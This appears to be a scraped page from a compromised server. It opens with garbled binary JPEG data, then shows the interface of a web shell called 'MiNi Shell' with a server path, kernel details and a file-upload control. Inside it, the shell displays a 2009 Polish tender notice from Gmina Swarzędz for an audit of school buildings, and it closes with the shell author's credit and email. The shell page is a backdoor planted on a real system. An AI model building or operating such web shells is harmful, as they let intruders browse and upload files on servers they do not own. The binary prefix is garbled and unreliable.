JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090406/58913-N-2009.html

<p class="kh_header"><b>Swarzędz: Wykonanie opracowania dotyczącego oceny stanu technicznego wraz z określeniem potrzeb remontowych budynków oświatowych znajdujących się na terenie Gminy Swarzędz dla zadania: Audyt placówek oświatowych na terenie Gminy Swarzędz</b><br>
<b>Numer ogłoszenia: 58913 - 2009; data zamieszczenia: 06.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Swarzędz , Rynek 1, 62-020 Swarzędz, woj. wielkopolskie, tel. (061) 65 12 000, faks (061) 65 12 211.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swarzedz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie opracowania dotyczącego oceny stanu technicznego wraz z określeniem potrzeb remontowych budynków oświatowych znajdujących się na terenie Gminy Swarzędz dla zadania: Audyt placówek oświatowych na terenie Gminy Swarzędz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
(CPV: 79.21.20.00-3, 71.24.20.00-6)
wykonanie opracowania dotyczącego oceny stanu technicznego wraz z określeniem potrzeb remontowych budynków oświatowych znajdujących się na terenie Gminy Swarzędz oraz kosztów ewentualnych robót budowlanych. Zestawienie obiektów będących przedmiotem zamówienia znajduje się w załączniku nr 1. Opracowanie nie musi zawierać analizy budynków pod kątem geodezyjnym i prawnym.
Celem niniejszego opisu przedmiotu zamówienia ma być określenie zakresu danych, jakie należy zebrać oraz zakresu oceny stanu technicznego, jaką należy przeprowadzić, dla potrzeb wykonania koncepcji-planu napraw, modernizacji (ew. rozbudowy) już istniejących budynków szkół, przedszkoli, żłobka wraz ze znajdującymi się na nich salami sportowymi oraz ew. realizacji nowych obiektów. Analiza ma na celu objęcie inwentaryzacją i oceną stanu technicznego wszystkich w/w obiektów znajdujących się na terenie  i Gminy Swarzędz .
Zagadnienie należy rozpatrywać zakładając kompleksową realizację wszystkich robót budowlanych w jednym obiekcie, tzn. dla każdej placówki oświatowej wraz z budynkami sal gimnastycznych, wyłączając boiska, chodniki place apelowe, ogrodzenia, bramy, parkingi itp., należy określić łączne potrzeby remontowe. 
 W opracowaniu proponuje się podejście polegające na wyodrębnieniu - podziale każdego budynku na minimum następujące elementy, które będą analizowane oddzielnie. 
Są to: 
1.fundamenty i izolacje przeciwwilgociowe (wraz ze ścianami fundamentowymi, opaską wokół budynku),
2.ściany nośne i działowe, 
3.stropy,
4.schody wraz z balustradami (zewnętrzne i wewnętrzne),
5.dach (konstrukcja, pokrycie oraz instalacja odgromowa, rynny i rury spustowe),
6.elewacja,
7.stolarka okienna i drzwiowa,
8.roboty tynkarskie i malarskie wewnątrz budynku,
9.inne roboty wykończeniowe ścian wewnętrznych (np.glazura, boazeria itp.)
10.podłogi i posadzki,
11.instalacja elektryczna, odgromowa, niskoprądowa, p.poż,
12.instalacja, wod.-kan.,
13.instalacja C.O.
14.wentylacja (ew. klimatyzacja)
15.inne
Oceny stanu technicznego powinny dokonać osoby posiadające uprawnienia do samodzielnego kierowania,  budową lub projektowania w zakresie robót ogólnobudowlanych,  sieci i instalacji elektrycznych sieci i instalacji wodno-kanalizacyjnych (we właściwych sobie zakresach).
Zamawiający dysponuje dokumentacją techniczną obiektów ujętych w załączniku nr 1, jednakże nie gwarantuje się, że we wszystkich przypadkach jest ona kompletna i aktualna. Przy ocenie stanu technicznego obiektów wymagane jest przeprowadzenie rozmów i np. wypełnienie ankiety z użytkownikami budynków (z dyrektorem placówki lub osobą przez niego wyznaczoną) potwierdzone stosownym protokołem. 
Zakłada się, że po dokonaniu oceny stanu technicznego istniejących obiektów, powinno nastąpić zestawienie niezbędnych do wykonania napraw wraz z podaniem ilości (przedmiaru) robót oraz oszacowaniem kosztów jednostkowych i łącznych tych napraw. Stopień dokładności podania ilości robót powinien wynosić max. +/- 10%.  Stopień dokładności oszacowania kosztów powinien być na poziomie publikacji np. ORGBUDu, WACETOBU, SEKOCENBUDU dotyczących cen robót zagregowanych elementów obiektów budowlanych wg możliwie najbardziej aktualnych cenników.
Na tym etapie przyjęto, że wszelkie proponowane prace naprawcze mają zapewnić użytkowanie istniejących obiektów na poziomie odpowiadającym obowiązującym: prawu budowlanemu, odpowiednim przepisom oraz normom. To będą wyznaczniki dla uzyskania poziomu standardowego obiektów. Określenie rodzaju potrzeb wraz z ich przybliżonymi kosztami (dla obiektów istniejących) stanowi zakończenie I-go etapu postępowania, a jednocześnie będzie punktem wyjścia do dalszych działań związanych z określeniem możliwości modernizacji i przebudowy istniejących obiektów, ewentualnymi rozbiórkami obiektów i zlokalizowaniem na ich miejscu obiektów o tym samym lub o innym przeznaczeniu, wykonaniem nowych obiektów stanowiących uzupełnienie dla już istniejących. Na tym etapie (II etap) należy przewidzieć zdefiniowanie ponadnormatywnego (podwyższonego) standardu dla poszczególnych rodzajów obiektów (standard ten będzie dotyczył parametrów technicznych obiektu, jego wyposażenia, wykończenia, rodzajów i sposobów działania oraz sterowania dla instalacji itp.). Dla każdego obiektu należy przedstawić i porównać przynajmniej dwa możliwe warianty rozwiązania wraz z podaniem kosztów tych wariantów np. modernizacja i rozbudowa obiektu (wariant 1) wraz z kosztami lub rozbiórka i realizacja nowego obiektu (wariant 2) wraz z kosztami. 
Opracowanie będące przedmiotem przetargu należy podzielić na kilka rozdziałów. W pierwszym proponuje się ująć zakres danych jakie należy zebrać o każdym z wyodrębnionych elementów budynku. W drugim natomiast proponuje się zawrzeć zakres oceny stanu technicznego tych elementów. Kolejny rozdział powinien zawierać propozycję dotyczącą klasyfikowania rodzajów napraw, określania stopnia pilności ich wykonania oraz tabelaryczne zestawienia rodzajów i zakresu napraw dla poszczególnych obiektów. To pozwoli na oszacowanie całkowitego kosztu napraw dotyczących budynków oświatowych.  Opracowanie proponuje się zakończyć sformułowaniem wniosków, które zawierać powinny plan remontów i modernizacji z podaniem ich pilności. 
Przedmiot zamówienia należy wykonać wg: Propozycji zakresu analizy dotyczącej zestawienia informacji i zebrania danych dotyczących budynków szkół, sal sportowych na terenie szkolnym, boisk przyszkolnych, placów i dziedzińców na terenie szkolnym oraz oceny stanu technicznego w/w obiektów, znajdujących się na terenie Miasta i Gminy Swarzędz - będącym załącznikiem nr 2.
(oceny stanu technicznego oraz kosztów robót wraz z ich analizą powinny dokonać osoby posiadające stosowne uprawnienia)
Zamawiający zastrzega sobie prawo do konsultowania z Wykonawcą i zatwierdzania, w trakcie realizacji zlecenia, szczegółów związanych z opracowaniem..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3, 71.24.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 3600,00 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wymagania stawiane Wykonawcom
O udzielenie zamówienia publicznego mogą ubiegać się wyłącznie Wykonawcy, którzy spełniają następujące warunki:
a)Posiadają uprawnienia do wykonywania przedmiotu zamówienia:
b)Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (wykazać):
dysponują co najmniej jedną osobą posiadającą uprawnienia do samodzielnego kierowania budową lub projektowania w zakresie robót ogólnobudowlanych,
dysponują co najmniej jedną osobą posiadającą uprawnienia do samodzielnego kierowania budową lub projektowania w zakresie sieci i instalacji elektrycznych,
dysponują co najmniej jedną osobą posiadającą uprawnienia do samodzielnego kierowania budową lub projektowania w zakresie sieci i instalacji wodno-kanalizacyjnych,
wykonali w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej  3 projekty budowlano-wykonawcze remontu lub modernizacji budynku z których co najmniej jeden posiada kubaturę nie mniejszej niż 7500m3, potwierdzone referencjami - dokumentami, że usługi te zostały wykonane należycie (referencje muszą potwierdzać zakres: wykonanie projektu budowlano-wykonawczego remontu lub modernizacji budynku - w tym jeden o kubaturze co najmniej 7500m3, czas jego wykonania i miejsce),
c)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
e)Załączą do oferty dokumenty zgodnie z Rozdziałem 3.
Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie dokumentów/oświadczeń złożonych wraz z ofertą, w skali spełnia / nie spełnia (złożonych przez Wykonawców a wymaganych przez zamawiającego dokumentów i oświadczeń - zgodnie z Specyfikacją istotnych warunków zamówienia - Rozdział 3 SIWZ: Wykaz wymaganych dokumentów)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Zamawiający żąda:
1.Wypełnionego i podpisanego DRUKU OFERTY (zgodnie z załączonym formularzem - ROZDZIAŁ 4);
2.Pełnomocnictwa  dla  jednego z wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych.
3.Oświadczenia o spełnieniu warunków zawartych w art. 22 ust. 1 ustawy prawo zamówień publicznych (zgodnie z ZAŁĄCZNIKIEM NR 1);
4.Upoważnienia do podpisania oferty - jeżeli nie wynika z załączonego  odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej.
II. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu, Zamawiający żąda:
1.Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
2.Oświadczenie, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie społeczne lub zdrowotne lub uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego (zgodnie z ZAŁĄCZNIKIEM Nr 2);
III. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda:
1.Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (zgodnie z ZAŁĄCZNIKIEM NR 3 i Rozdziałem nr 1 pkt 4.1), oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie (zgodnie z Rozdziałem nr 1 pkt 4.1) ;
2.Wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności  (zgodnie z ZAŁĄCZNIKIEM NR 4 i Rozdziałem nr 1 pkt 4.1);
3.Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt III.2., Wykonawca wskazał osoby, którymi będzie dysponował (zgodnie z ZAŁĄCZNIKIEM NR 5);
4.Dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (zgodnie z Rozdziałem nr 1 pkt 4.1).
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, kwestię dokumentów składanych na potwierdzenie w/w faktów określa §2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (DZ.U Nr. 87,poz. 605 z 2006r. ze zm. w Dz.U. Nr.188, poz. 1155 z 2008r.).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.swarzedz.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego - Urząd Miasta i Gminy Swarzędz, Rynek 1, 62-020 Swarzędz, pokój 410..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy Swarzędz, Rynek 1, 62-020 Swarzędz, Biuro Obsługi Interesanta - Kancelaria Urzędu (parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com